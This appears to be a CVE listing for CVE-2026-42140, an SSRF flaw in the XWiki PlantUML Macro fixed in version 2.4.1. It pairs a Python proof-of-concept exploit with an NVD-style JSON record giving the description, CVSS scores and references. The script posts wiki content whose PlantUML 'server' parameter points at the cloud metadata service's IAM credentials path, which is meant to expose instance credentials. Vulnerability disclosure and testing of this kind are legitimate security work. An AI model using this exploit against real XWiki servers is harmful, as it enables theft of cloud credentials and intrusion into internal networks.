CVE-2026-42140

import requests # Target XWiki instance URL target_url = "http://vulnerable-xwiki-instance/xwiki/bin/view/Main/WebHome" # Internal IP address to scan (e.g., AWS metadata service) internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # The payload exploiting the 'server' parameter in PlantUML Macro # Syntax depends on how the macro is invoked (e.g., in wiki content) payload_content = "{{plantuml server='{}'}}\n@startuml\nBob -> Alice : SSRF Test\n@enduml".format(internal_target) # Data to simulate editing or creating a page with the malicious macro # Note: Actual API endpoints may vary based on XWiki configuration data = { "form_token": "<valid_token_if_needed>", "content": payload_content, "title": "SSRF_PoC_Page" } try: # Sending the request to create/update the page response = requests.post(target_url, data=data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the server logs or the rendered page for SSRF indicators.") print("[+] If the internal service is accessible, sensitive data might be leaked in the diagram rendering process.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-42140", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:31.677", "lastModified": "2026-05-07T15:43:39.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PlantUML Macro is a macro for rendering UML diagrams from simple textual schemes. Prior to version 2.4.1, the PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the server parameter. However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL. The XWiki server will attempt to connect to this URL to \"render\" the diagram. This issue has been patched in version 2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/xwiki-contrib/macro-plantuml/commit/c8b19bda93058794e04c8862fc7ca85c59b5fe5c", "source": "[email protected]"}, {"url": "https://github.com/xwiki-contrib/macro-plantuml/security/advisories/GHSA-42fc-7w97-8vrc", "source": "[email protected]"}, {"url": "https://jira.xwiki.org/browse/PLANTUML-25", "source": "[email protected]"}]}}